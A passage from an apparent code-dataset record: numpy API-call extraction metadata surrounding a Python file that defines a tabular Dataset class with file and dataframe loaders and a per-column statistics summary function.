((6026, 6066), 'numpy.logical_not', 'np.logical_not', (['pruning_mask[rand_map_0]'], {}), '(pruning_mask[rand_map_0])\n', (6040, 6066), True, 'import numpy as np\n'), ((6169, 6218), 'numpy.logical_or', 'np.logical_or', (['pruning_mask', 'pruning_mask_recover'], {}), '(pruning_mask, pruning_mask_recover)\n', (6182, 6218), True, 'import numpy as np\n'), ((6231, 6264), 'numpy.reshape', 'np.reshape', (['init_mask', 'tile_shape'], {}), '(init_mask, tile_shape)\n', (6241, 6264), True, 'import numpy as np\n'), ((6327, 6381), 'numpy.tile', 'np.tile', (['rand_map_0', '[weight_shape[0] / tile_shape[0]]'], {}), '(rand_map_0, [weight_shape[0] / tile_shape[0]])\n', (6334, 6381), True, 'import numpy as np\n'), ((6399, 6453), 'numpy.tile', 'np.tile', (['rand_map_1', '[weight_shape[0] / tile_shape[0]]'], {}), '(rand_map_1, [weight_shape[0] / tile_shape[0]])\n', (6406, 6453), True, 'import numpy as np\n'), ((6471, 6525), 'numpy.tile', 'np.tile', 
(['rand_map_2', '[weight_shape[0] / tile_shape[0]]'], {}), '(rand_map_2, [weight_shape[0] / tile_shape[0]])\n', (6478, 6525), True, 'import numpy as np\n'), ((7198, 7236), 'numpy.reshape', 'np.reshape', (['bl_w1_rand_0', 'weight_shape'], {}), '(bl_w1_rand_0, weight_shape)\n', (7208, 7236), True, 'import numpy as np\n'), ((8681, 8699), 'numpy.array', 'np.array', (['bl_gamma'], {}), '(bl_gamma)\n', (8689, 8699), True, 'import numpy as np\n'), ((8718, 8736), 'numpy.array', 'np.array', (['bl_means'], {}), '(bl_means)\n', (8726, 8736), True, 'import numpy as np\n'), ((8762, 8787), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (8770, 8787), True, 'import numpy as np\n'), ((13604, 13619), 'numpy.shape', 'np.shape', (['bl_w1'], {}), '(bl_w1)\n', (13612, 13619), True, 'import numpy as np\n'), ((13633, 13650), 'numpy.shape', 'np.shape', (['pret_c1'], {}), '(pret_c1)\n', (13641, 13650), True, 'import numpy as np\n'), ((13663, 13683), 'numpy.zeros', 'np.zeros', (['tile_shape'], {}), '(tile_shape)\n', (13671, 13683), True, 'import numpy as np\n'), ((13695, 13714), 'numpy.ones', 'np.ones', (['tile_shape'], {}), '(tile_shape)\n', (13702, 13714), True, 'import numpy as np\n'), ((13804, 13819), 'numpy.array', 'np.array', (['bl_w1'], {}), '(bl_w1)\n', (13812, 13819), True, 'import numpy as np\n'), ((13828, 13843), 'numpy.array', 'np.array', (['bl_w1'], {}), '(bl_w1)\n', (13836, 13843), True, 'import numpy as np\n'), ((13858, 13882), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\n', (13867, 13882), True, 'import numpy as np\n'), ((13883, 13912), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_0'], {}), '(rand_map_0)\n', (13900, 13912), True, 'import numpy as np\n'), ((13926, 13950), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\n', (13935, 13950), True, 'import numpy as np\n'), ((13951, 13980), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_1'], {}), '(rand_map_1)\n', (13968, 13980), True, 'import numpy as np\n'), ((13994, 14018), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\n', (14003, 14018), True, 'import numpy as np\n'), ((14019, 14048), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_2'], {}), '(rand_map_2)\n', (14036, 14048), True, 'import numpy as np\n'), ((14116, 14156), 'numpy.logical_not', 'np.logical_not', (['pruning_mask[rand_map_0]'], {}), '(pruning_mask[rand_map_0])\n', (14130, 14156), True, 'import numpy as np\n'), ((14259, 14308), 'numpy.logical_or', 'np.logical_or', (['pruning_mask', 'pruning_mask_recover'], {}), '(pruning_mask, pruning_mask_recover)\n', (14272, 14308), True, 'import numpy as np\n'), ((14321, 14354), 'numpy.reshape', 'np.reshape', (['init_mask', 'tile_shape'], {}), '(init_mask, tile_shape)\n', (14331, 14354), True, 'import numpy as np\n'), ((14417, 14471), 'numpy.tile', 'np.tile', (['rand_map_0', '[weight_shape[0] / tile_shape[0]]'], {}), '(rand_map_0, [weight_shape[0] / tile_shape[0]])\n', (14424, 14471), True, 'import numpy as np\n'), ((14489, 14543), 'numpy.tile', 'np.tile', (['rand_map_1', '[weight_shape[0] / tile_shape[0]]'], {}), '(rand_map_1, [weight_shape[0] / tile_shape[0]])\n', (14496, 14543), True, 'import numpy as np\n'), ((14561, 14615), 'numpy.tile', 'np.tile', (['rand_map_2', '[weight_shape[0] / tile_shape[0]]'], {}), '(rand_map_2, [weight_shape[0] / tile_shape[0]])\n', (14568, 14615), True, 'import numpy as np\n'), ((15288, 15326), 'numpy.reshape', 'np.reshape', (['bl_w1_rand_0', 'weight_shape'], {}), '(bl_w1_rand_0, 
weight_shape)\n', (15298, 15326), True, 'import numpy as np\n'), ((16771, 16789), 'numpy.array', 'np.array', (['bl_gamma'], {}), '(bl_gamma)\n', (16779, 16789), True, 'import numpy as np\n'), ((16808, 16826), 'numpy.array', 'np.array', (['bl_means'], {}), '(bl_means)\n', (16816, 16826), True, 'import numpy as np\n'), ((16852, 16877), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (16860, 16877), True, 'import numpy as np\n'), ((21694, 21709), 'numpy.shape', 'np.shape', (['bl_w1'], {}), '(bl_w1)\n', (21702, 21709), True, 'import numpy as np\n'), ((21723, 21740), 'numpy.shape', 'np.shape', (['pret_c1'], {}), '(pret_c1)\n', (21731, 21740), True, 'import numpy as np\n'), ((21753, 21773), 'numpy.zeros', 'np.zeros', (['tile_shape'], {}), '(tile_shape)\n', (21761, 21773), True, 'import numpy as np\n'), ((21785, 21804), 'numpy.ones', 'np.ones', (['tile_shape'], {}), '(tile_shape)\n', (21792, 21804), True, 'import numpy as np\n'), ((21894, 21909), 'numpy.array', 'np.array', (['bl_w1'], {}), '(bl_w1)\n', (21902, 21909), True, 'import numpy as np\n'), ((21918, 21933), 'numpy.array', 'np.array', (['bl_w1'], {}), '(bl_w1)\n', (21926, 21933), True, 'import numpy as np\n'), ((21948, 21972), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\n', (21957, 21972), True, 'import numpy as np\n'), ((21973, 22002), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_0'], {}), '(rand_map_0)\n', (21990, 22002), True, 'import numpy as np\n'), ((22016, 22040), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\n', (22025, 22040), True, 'import numpy as np\n'), ((22041, 22070), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_1'], {}), '(rand_map_1)\n', (22058, 22070), True, 'import numpy as np\n'), ((22084, 22108), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\n', (22093, 22108), True, 'import numpy as np\n'), ((22109, 22138), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_2'], {}), '(rand_map_2)\n', (22126, 22138), True, 'import numpy as np\n'), ((22206, 22246), 'numpy.logical_not', 'np.logical_not', (['pruning_mask[rand_map_0]'], {}), '(pruning_mask[rand_map_0])\n', (22220, 22246), True, 'import numpy as np\n'), ((22349, 22398), 'numpy.logical_or', 'np.logical_or', (['pruning_mask', 'pruning_mask_recover'], {}), '(pruning_mask, pruning_mask_recover)\n', (22362, 22398), True, 'import numpy as np\n'), ((22411, 22444), 'numpy.reshape', 'np.reshape', (['init_mask', 'tile_shape'], {}), '(init_mask, tile_shape)\n', (22421, 22444), True, 'import numpy as np\n'), ((22507, 22561), 'numpy.tile', 'np.tile', (['rand_map_0', '[weight_shape[0] / tile_shape[0]]'], {}), '(rand_map_0, [weight_shape[0] / tile_shape[0]])\n', (22514, 22561), True, 'import numpy as np\n'), ((22579, 22633), 'numpy.tile', 'np.tile', (['rand_map_1', '[weight_shape[0] / tile_shape[0]]'], {}), '(rand_map_1, [weight_shape[0] / tile_shape[0]])\n', (22586, 22633), True, 'import numpy as np\n'), ((22651, 22705), 'numpy.tile', 'np.tile', (['rand_map_2', '[weight_shape[0] / tile_shape[0]]'], {}), '(rand_map_2, [weight_shape[0] / tile_shape[0]])\n', (22658, 22705), True, 'import numpy as np\n'), ((23378, 23416), 'numpy.reshape', 'np.reshape', (['bl_w1_rand_0', 'weight_shape'], {}), '(bl_w1_rand_0, weight_shape)\n', (23388, 23416), True, 'import numpy as np\n'), ((24861, 24879), 'numpy.array', 'np.array', (['bl_gamma'], {}), '(bl_gamma)\n', (24869, 24879), True, 'import numpy as np\n'), ((24898, 24916), 'numpy.array', 'np.array', (['bl_means'], 
{}), '(bl_means)\n', (24906, 24916), True, 'import numpy as np\n'), ((24942, 24967), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (24950, 24967), True, 'import numpy as np\n'), ((29784, 29799), 'numpy.shape', 'np.shape', (['bl_w1'], {}), '(bl_w1)\n', (29792, 29799), True, 'import numpy as np\n'), ((29813, 29830), 'numpy.shape', 'np.shape', (['pret_c1'], {}), '(pret_c1)\n', (29821, 29830), True, 'import numpy as np\n'), ((29843, 29863), 'numpy.zeros', 'np.zeros', (['tile_shape'], {}), '(tile_shape)\n', (29851, 29863), True, 'import numpy as np\n'), ((29875, 29894), 'numpy.ones', 'np.ones', (['tile_shape'], {}), '(tile_shape)\n', (29882, 29894), True, 'import numpy as np\n'), ((29984, 29999), 'numpy.array', 'np.array', (['bl_w1'], {}), '(bl_w1)\n', (29992, 29999), True, 'import numpy as np\n'), ((30008, 30023), 'numpy.array', 'np.array', (['bl_w1'], {}), '(bl_w1)\n', (30016, 30023), True, 'import numpy as np\n'), ((30038, 30062), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\n', (30047, 30062), True, 'import numpy as np\n'), ((30063, 30092), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_0'], {}), '(rand_map_0)\n', (30080, 30092), True, 'import numpy as np\n'), ((30106, 30130), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\n', (30115, 30130), True, 'import numpy as np\n'), ((30131, 30160), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_1'], {}), '(rand_map_1)\n', (30148, 30160), True, 'import numpy as np\n'), ((30174, 30198), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\n', (30183, 30198), True, 'import numpy as np\n'), ((30199, 30228), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_2'], {}), '(rand_map_2)\n', (30216, 30228), True, 'import numpy as np\n'), ((30296, 30336), 'numpy.logical_not', 'np.logical_not', (['pruning_mask[rand_map_0]'], {}), '(pruning_mask[rand_map_0])\n', (30310, 30336), True, 'import numpy as np\n'), ((30439, 30488), 'numpy.logical_or', 'np.logical_or', (['pruning_mask', 'pruning_mask_recover'], {}), '(pruning_mask, pruning_mask_recover)\n', (30452, 30488), True, 'import numpy as np\n'), ((30501, 30534), 'numpy.reshape', 'np.reshape', (['init_mask', 'tile_shape'], {}), '(init_mask, tile_shape)\n', (30511, 30534), True, 'import numpy as np\n'), ((30597, 30651), 'numpy.tile', 'np.tile', (['rand_map_0', '[weight_shape[0] / tile_shape[0]]'], {}), '(rand_map_0, [weight_shape[0] / tile_shape[0]])\n', (30604, 30651), True, 'import numpy as np\n'), ((30669, 30723), 'numpy.tile', 'np.tile', (['rand_map_1', '[weight_shape[0] / tile_shape[0]]'], {}), '(rand_map_1, [weight_shape[0] / tile_shape[0]])\n', (30676, 30723), True, 'import numpy as np\n'), ((30741, 30795), 'numpy.tile', 'np.tile', (['rand_map_2', '[weight_shape[0] / tile_shape[0]]'], {}), '(rand_map_2, [weight_shape[0] / tile_shape[0]])\n', (30748, 30795), True, 'import numpy as np\n'), ((31468, 31506), 'numpy.reshape', 'np.reshape', (['bl_w1_rand_0', 'weight_shape'], {}), '(bl_w1_rand_0, weight_shape)\n', (31478, 31506), True, 'import numpy as np\n'), ((32951, 32969), 'numpy.array', 'np.array', (['bl_gamma'], {}), '(bl_gamma)\n', (32959, 32969), True, 'import numpy as np\n'), ((32988, 33006), 'numpy.array', 'np.array', (['bl_means'], {}), '(bl_means)\n', (32996, 33006), True, 'import numpy as np\n'), ((33032, 33057), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (33040, 33057), True, 'import numpy as np\n'), ((34347, 34364), 'numpy.array', 'np.array', 
(['bl_beta'], {}), '(bl_beta)\n', (34355, 34364), True, 'import numpy as np\n'), ((34380, 34398), 'numpy.array', 'np.array', (['bl_gamma'], {}), '(bl_gamma)\n', (34388, 34398), True, 'import numpy as np\n'), ((34420, 34444), 'numpy.array', 'np.array', (['bl_moving_mean'], {}), '(bl_moving_mean)\n', (34428, 34444), True, 'import numpy as np\n'), ((34470, 34498), 'numpy.array', 'np.array', (['bl_moving_variance'], {}), '(bl_moving_variance)\n', (34478, 34498), True, 'import numpy as np\n'), ((35347, 35364), 'numpy.array', 'np.array', (['bl_beta'], {}), '(bl_beta)\n', (35355, 35364), True, 'import numpy as np\n'), ((35380, 35398), 'numpy.array', 'np.array', (['bl_gamma'], {}), '(bl_gamma)\n', (35388, 35398), True, 'import numpy as np\n'), ((35420, 35444), 'numpy.array', 'np.array', (['bl_moving_mean'], {}), '(bl_moving_mean)\n', (35428, 35444), True, 'import numpy as np\n'), ((35470, 35498), 'numpy.array', 'np.array', (['bl_moving_variance'], {}), '(bl_moving_variance)\n', (35478, 35498), True, 'import numpy as np\n'), ((36347, 36364), 'numpy.array', 'np.array', (['bl_beta'], {}), '(bl_beta)\n', (36355, 36364), True, 'import numpy as np\n'), ((36380, 36398), 'numpy.array', 'np.array', (['bl_gamma'], {}), '(bl_gamma)\n', (36388, 36398), True, 'import numpy as np\n'), ((36420, 36444), 'numpy.array', 'np.array', (['bl_moving_mean'], {}), '(bl_moving_mean)\n', (36428, 36444), True, 'import numpy as np\n'), ((36470, 36498), 'numpy.array', 'np.array', (['bl_moving_variance'], {}), '(bl_moving_variance)\n', (36478, 36498), True, 'import numpy as np\n'), ((37347, 37364), 'numpy.array', 'np.array', (['bl_beta'], {}), '(bl_beta)\n', (37355, 37364), True, 'import numpy as np\n'), ((37380, 37398), 'numpy.array', 'np.array', (['bl_gamma'], {}), '(bl_gamma)\n', (37388, 37398), True, 'import numpy as np\n'), ((37420, 37444), 'numpy.array', 'np.array', (['bl_moving_mean'], {}), '(bl_moving_mean)\n', (37428, 37444), True, 'import numpy as np\n'), ((37470, 37498), 'numpy.array', 'np.array', (['bl_moving_variance'], {}), '(bl_moving_variance)\n', (37478, 37498), True, 'import numpy as np\n'), ((38347, 38364), 'numpy.array', 'np.array', (['bl_beta'], {}), '(bl_beta)\n', (38355, 38364), True, 'import numpy as np\n'), ((38380, 38398), 'numpy.array', 'np.array', (['bl_gamma'], {}), '(bl_gamma)\n', (38388, 38398), True, 'import numpy as np\n'), ((38420, 38444), 'numpy.array', 'np.array', (['bl_moving_mean'], {}), '(bl_moving_mean)\n', (38428, 38444), True, 'import numpy as np\n'), ((38470, 38498), 'numpy.array', 'np.array', (['bl_moving_variance'], {}), '(bl_moving_variance)\n', (38478, 38498), True, 'import numpy as np\n'), ((5641, 5660), 'numpy.ones', 'np.ones', (['tile_shape'], {}), '(tile_shape)\n', (5648, 5660), True, 'import numpy as np\n'), ((6090, 6129), 'numpy.logical_and', 'np.logical_and', (['pruning_mask', 'init_mask'], {}), '(pruning_mask, init_mask)\n', (6104, 6129), True, 'import numpy as np\n'), ((6130, 6152), 'numpy.argsort', 'np.argsort', (['rand_map_0'], {}), '(rand_map_0)\n', (6140, 6152), True, 'import numpy as np\n'), ((13731, 13750), 'numpy.ones', 'np.ones', (['tile_shape'], {}), '(tile_shape)\n', (13738, 13750), True, 'import numpy as np\n'), ((14180, 14219), 'numpy.logical_and', 'np.logical_and', (['pruning_mask', 'init_mask'], {}), '(pruning_mask, init_mask)\n', (14194, 14219), True, 'import numpy as np\n'), ((14220, 14242), 'numpy.argsort', 'np.argsort', (['rand_map_0'], {}), '(rand_map_0)\n', (14230, 14242), True, 'import numpy as np\n'), ((21821, 21840), 'numpy.ones', 'np.ones', 
(['tile_shape'], {}), '(tile_shape)\n', (21828, 21840), True, 'import numpy as np\n'), ((22270, 22309), 'numpy.logical_and', 'np.logical_and', (['pruning_mask', 'init_mask'], {}), '(pruning_mask, init_mask)\n', (22284, 22309), True, 'import numpy as np\n'), ((22310, 22332), 'numpy.argsort', 'np.argsort', (['rand_map_0'], {}), '(rand_map_0)\n', (22320, 22332), True, 'import numpy as np\n'), ((29911, 29930), 'numpy.ones', 'np.ones', (['tile_shape'], {}), '(tile_shape)\n', (29918, 29930), True, 'import numpy as np\n'), ((30360, 30399), 'numpy.logical_and', 'np.logical_and', (['pruning_mask', 'init_mask'], {}), '(pruning_mask, init_mask)\n', (30374, 30399), True, 'import numpy as np\n'), ((30400, 30422), 'numpy.argsort', 'np.argsort', (['rand_map_0'], {}), '(rand_map_0)\n', (30410, 30422), True, 'import numpy as np\n'), ((635, 650), 'numpy.array', 'np.array', (['bl_w1'], {}), '(bl_w1)\n', (643, 650), True, 'import numpy as np\n'), ((1064, 1089), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (1072, 1089), True, 'import numpy as np\n'), ((5975, 6000), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (5983, 6000), True, 'import numpy as np\n'), ((8485, 8516), 'numpy.reshape', 'np.reshape', (['rand_map_0', '(-1, 1)'], {}), '(rand_map_0, (-1, 1))\n', (8495, 8516), True, 'import numpy as np\n'), ((8553, 8584), 'numpy.reshape', 'np.reshape', (['rand_map_1', '(-1, 1)'], {}), '(rand_map_1, (-1, 1))\n', (8563, 8584), True, 'import numpy as np\n'), ((8621, 8652), 'numpy.reshape', 'np.reshape', (['rand_map_2', '(-1, 1)'], {}), '(rand_map_2, (-1, 1))\n', (8631, 8652), True, 'import numpy as np\n'), ((8809, 8847), 'numpy.reshape', 'np.reshape', (['rand_map_0_expand', '[-1, 1]'], {}), '(rand_map_0_expand, [-1, 1])\n', (8819, 8847), True, 'import numpy as np\n'), ((8926, 8964), 'numpy.reshape', 'np.reshape', (['rand_map_1_expand', '[-1, 1]'], {}), '(rand_map_1_expand, [-1, 1])\n', (8936, 8964), True, 'import numpy as np\n'), ((9043, 9081), 'numpy.reshape', 'np.reshape', (['rand_map_2_expand', '[-1, 1]'], {}), '(rand_map_2_expand, [-1, 1])\n', (9053, 9081), True, 'import numpy as np\n'), ((9154, 9179), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (9162, 9179), True, 'import numpy as np\n'), ((14065, 14090), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (14073, 14090), True, 'import numpy as np\n'), ((16575, 16606), 'numpy.reshape', 'np.reshape', (['rand_map_0', '(-1, 1)'], {}), '(rand_map_0, (-1, 1))\n', (16585, 16606), True, 'import numpy as np\n'), ((16643, 16674), 'numpy.reshape', 'np.reshape', (['rand_map_1', '(-1, 1)'], {}), '(rand_map_1, (-1, 1))\n', (16653, 16674), True, 'import numpy as np\n'), ((16711, 16742), 'numpy.reshape', 'np.reshape', (['rand_map_2', '(-1, 1)'], {}), '(rand_map_2, (-1, 1))\n', (16721, 16742), True, 'import numpy as np\n'), ((16899, 16937), 'numpy.reshape', 'np.reshape', (['rand_map_0_expand', '[-1, 1]'], {}), '(rand_map_0_expand, [-1, 1])\n', (16909, 16937), True, 'import numpy as np\n'), ((17016, 17054), 'numpy.reshape', 'np.reshape', (['rand_map_1_expand', '[-1, 1]'], {}), '(rand_map_1_expand, [-1, 1])\n', (17026, 17054), True, 'import numpy as np\n'), ((17133, 17171), 'numpy.reshape', 'np.reshape', (['rand_map_2_expand', '[-1, 1]'], {}), '(rand_map_2_expand, [-1, 1])\n', (17143, 17171), True, 'import numpy as np\n'), ((17244, 17269), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (17252, 17269), True, 'import numpy as np\n'), 
((22155, 22180), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (22163, 22180), True, 'import numpy as np\n'), ((24665, 24696), 'numpy.reshape', 'np.reshape', (['rand_map_0', '(-1, 1)'], {}), '(rand_map_0, (-1, 1))\n', (24675, 24696), True, 'import numpy as np\n'), ((24733, 24764), 'numpy.reshape', 'np.reshape', (['rand_map_1', '(-1, 1)'], {}), '(rand_map_1, (-1, 1))\n', (24743, 24764), True, 'import numpy as np\n'), ((24801, 24832), 'numpy.reshape', 'np.reshape', (['rand_map_2', '(-1, 1)'], {}), '(rand_map_2, (-1, 1))\n', (24811, 24832), True, 'import numpy as np\n'), ((24989, 25027), 'numpy.reshape', 'np.reshape', (['rand_map_0_expand', '[-1, 1]'], {}), '(rand_map_0_expand, [-1, 1])\n', (24999, 25027), True, 'import numpy as np\n'), ((25106, 25144), 'numpy.reshape', 'np.reshape', (['rand_map_1_expand', '[-1, 1]'], {}), '(rand_map_1_expand, [-1, 1])\n', (25116, 25144), True, 'import numpy as np\n'), ((25223, 25261), 'numpy.reshape', 'np.reshape', (['rand_map_2_expand', '[-1, 1]'], {}), '(rand_map_2_expand, [-1, 1])\n', (25233, 25261), True, 'import numpy as np\n'), ((25334, 25359), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (25342, 25359), True, 'import numpy as np\n'), ((30245, 30270), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (30253, 30270), True, 'import numpy as np\n'), ((32755, 32786), 'numpy.reshape', 'np.reshape', (['rand_map_0', '(-1, 1)'], {}), '(rand_map_0, (-1, 1))\n', (32765, 32786), True, 'import numpy as np\n'), ((32823, 32854), 'numpy.reshape', 'np.reshape', (['rand_map_1', '(-1, 1)'], {}), '(rand_map_1, (-1, 1))\n', (32833, 32854), True, 'import numpy as np\n'), ((32891, 32922), 'numpy.reshape', 'np.reshape', (['rand_map_2', '(-1, 1)'], {}), '(rand_map_2, (-1, 1))\n', (32901, 32922), True, 'import numpy as np\n'), ((33079, 33117), 'numpy.reshape', 'np.reshape', (['rand_map_0_expand', '[-1, 1]'], {}), '(rand_map_0_expand, [-1, 1])\n', (33089, 33117), True, 'import numpy as np\n'), ((33196, 33234), 'numpy.reshape', 'np.reshape', (['rand_map_1_expand', '[-1, 1]'], {}), '(rand_map_1_expand, [-1, 1])\n', (33206, 33234), True, 'import numpy as np\n'), ((33313, 33351), 'numpy.reshape', 'np.reshape', (['rand_map_2_expand', '[-1, 1]'], {}), '(rand_map_2_expand, [-1, 1])\n', (33323, 33351), True, 'import numpy as np\n'), ((33424, 33449), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (33432, 33449), True, 'import numpy as np\n'), ((1109, 1134), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (1117, 1134), True, 'import numpy as np\n'), ((9199, 9224), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (9207, 9224), True, 'import numpy as np\n'), ((17289, 17314), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (17297, 17314), True, 'import numpy as np\n'), ((25379, 25404), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (25387, 25404), True, 'import numpy as np\n'), ((33469, 33494), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (33477, 33494), True, 'import numpy as np\n')] |
import pandas as pd
import numpy as np
from src.si.util.util import label_gen
__all__ = ['Dataset']
class Dataset:
def __init__(self, X=None, Y=None,
xnames: list = None,
yname: str = None):
""" Tabular Dataset"""
if X is None:
raise Exception("Trying to instanciate a DataSet without any data")
self.X = X
self.Y = Y
self.xnames = xnames if xnames else label_gen(X.shape[1])
self.yname = yname if yname else 'Y'
@classmethod
def from_data(cls, filename, sep=",", labeled=True):
"""Creates a DataSet from a data file.
:param filename: The filename
:type filename: str
:param sep: attributes separator, defaults to ","
        :type sep: str, optional
        :param labeled: whether the last column of the file holds the labels, defaults to True
        :type labeled: bool, optional
:return: A DataSet object
:rtype: DataSet
"""
data = np.genfromtxt(filename, delimiter=sep)
if labeled:
X = data[:, 0:-1]
Y = data[:, -1]
else:
X = data
Y = None
return cls(X, Y)
@classmethod
def from_dataframe(cls, df, ylabel=None):
"""Creates a DataSet from a pandas dataframe.
        :param df: the dataframe holding the data
        :type df: pandas.DataFrame
        :param ylabel: name of the column to use as the dependent variable (label), defaults to None
        :type ylabel: str, optional
        :return: A DataSet object
        :rtype: DataSet
"""
if ylabel and ylabel in df.columns:
            X = df.loc[:, df.columns != ylabel].to_numpy()  # convert to a numpy array
Y = df.loc[:, ylabel].to_numpy()
# xnames = df.columns.tolist().remove(ylabel)
yname = ylabel
xnames = df.columns.tolist()
for name in xnames:
if name == yname:
xnames.remove(yname)
else:
X = df.to_numpy()
Y = None
xnames = df.columns.tolist()
yname = None
return cls(X, Y, xnames, yname)
def __len__(self):
"""Returns the number of data points."""
return self.X.shape[0]
def hasLabel(self):
"""Returns True if the dataset constains labels (a dependent variable)"""
return self.Y is not None
def getNumFeatures(self):
"""Returns the number of features"""
return self.X.shape[1]
def getNumClasses(self):
"""Returns the number of label classes or 0 if the dataset has no dependent variable."""
return len(np.unique(self.Y)) if self.hasLabel() else 0
def writeDataset(self, filename, sep=","):
"""Saves the dataset to a file
:param filename: The output file path
:type filename: str
:param sep: The fields separator, defaults to ","
:type sep: str, optional
"""
fullds = np.hstack((self.X, self.Y.reshape(len(self.Y), 1)))
np.savetxt(filename, fullds, delimiter=sep)
def toDataframe(self):
""" Converts the dataset into a pandas DataFrame"""
if self.hasLabel():
df = pd.DataFrame(np.hstack((self.X, self.Y.reshape(len(self.Y), 1))), columns=self.xnames[:]+[self.yname]) #columns=np.hstack((self.xnames, self.yname)))
else:
df = pd.DataFrame(self.X.copy(), columns=self.xnames[:])
return df
def getXy(self):
return self.X, self.Y
def summary(dataset, format='df'):
""" Returns the statistics of a dataset(mean, std, max, min)
:param dataset: A Dataset object
:type dataset: si.data.Dataset
:param format: Output format ('df':DataFrame, 'dict':dictionary ), defaults to 'df'
:type format: str, optional
"""
if format not in ["df", "dict"]:
raise Exception("Invalid format. Choose between 'df' and 'dict'.")
if dataset.hasLabel():
data = np.hstack((dataset.X, dataset.Y.reshape(len(dataset.Y), 1)))
#data = np.hstack([dataset.X, np.reshape(dataset.Y, (-1, 1))])
columns = dataset.xnames[:] + [dataset.yname]
else:
data = dataset.X
columns = dataset.xnames[:]
stats = {}
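    # When the labels are strings, statistics are computed only over the feature columns (the label column is skipped).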
    if dataset.hasLabel() and type(dataset.Y[0]) is str:
        for i in range(data.shape[1]-1):  # iterate over columns, excluding the label column
_means = np.mean(data[:, i], axis=0)
_vars = np.var(data[:, i], axis=0)
_maxs = np.max(data[:, i], axis=0)
_mins = np.min(data[:, i], axis=0)
stat = {"mean": _means,
"var": _vars,
"max": _maxs,
"min": _mins
}
stats[columns[i]] = stat
else:
        for i in range(data.shape[1]):  # iterate over all columns
_means = np.mean(data[:, i], axis=0)
_vars = np.var(data[:, i], axis=0)
_maxs = np.max(data[:, i], axis=0)
_mins = np.min(data[:, i], axis=0)
stat = {"mean": _means,
"var": _vars,
"max": _maxs,
"min": _mins
}
stats[columns[i]] = stat
# _means = np.mean(data, axis=0)
# _vars = np.var(data, axis=0)
# _maxs = np.max(data, axis=0)
# _mins = np.min(data, axis=0)
# stats = {}
# for i in range(data.shape[1]):
# stat = {"mean": _means[i],
# "var": _vars[i],
# "max": _maxs[i],
# "min": _mins[i]
# }
# stats[columns[i]] = stat
if format == "dict":
return stats
else:
return pd.DataFrame(stats)
| [
"src.si.util.util.label_gen",
"numpy.mean",
"numpy.unique",
"numpy.max",
"numpy.savetxt",
"numpy.min",
"pandas.DataFrame",
"numpy.genfromtxt",
"numpy.var"
] | [((878, 916), 'numpy.genfromtxt', 'np.genfromtxt', (['filename'], {'delimiter': 'sep'}), '(filename, delimiter=sep)\n', (891, 916), True, 'import numpy as np\n'), ((2885, 2928), 'numpy.savetxt', 'np.savetxt', (['filename', 'fullds'], {'delimiter': 'sep'}), '(filename, fullds, delimiter=sep)\n', (2895, 2928), True, 'import numpy as np\n'), ((5482, 5501), 'pandas.DataFrame', 'pd.DataFrame', (['stats'], {}), '(stats)\n', (5494, 5501), True, 'import pandas as pd\n'), ((446, 467), 'src.si.util.util.label_gen', 'label_gen', (['X.shape[1]'], {}), '(X.shape[1])\n', (455, 467), False, 'from src.si.util.util import label_gen\n'), ((4202, 4229), 'numpy.mean', 'np.mean', (['data[:, i]'], {'axis': '(0)'}), '(data[:, i], axis=0)\n', (4209, 4229), True, 'import numpy as np\n'), ((4250, 4276), 'numpy.var', 'np.var', (['data[:, i]'], {'axis': '(0)'}), '(data[:, i], axis=0)\n', (4256, 4276), True, 'import numpy as np\n'), ((4297, 4323), 'numpy.max', 'np.max', (['data[:, i]'], {'axis': '(0)'}), '(data[:, i], axis=0)\n', (4303, 4323), True, 'import numpy as np\n'), ((4344, 4370), 'numpy.min', 'np.min', (['data[:, i]'], {'axis': '(0)'}), '(data[:, i], axis=0)\n', (4350, 4370), True, 'import numpy as np\n'), ((4652, 4679), 'numpy.mean', 'np.mean', (['data[:, i]'], {'axis': '(0)'}), 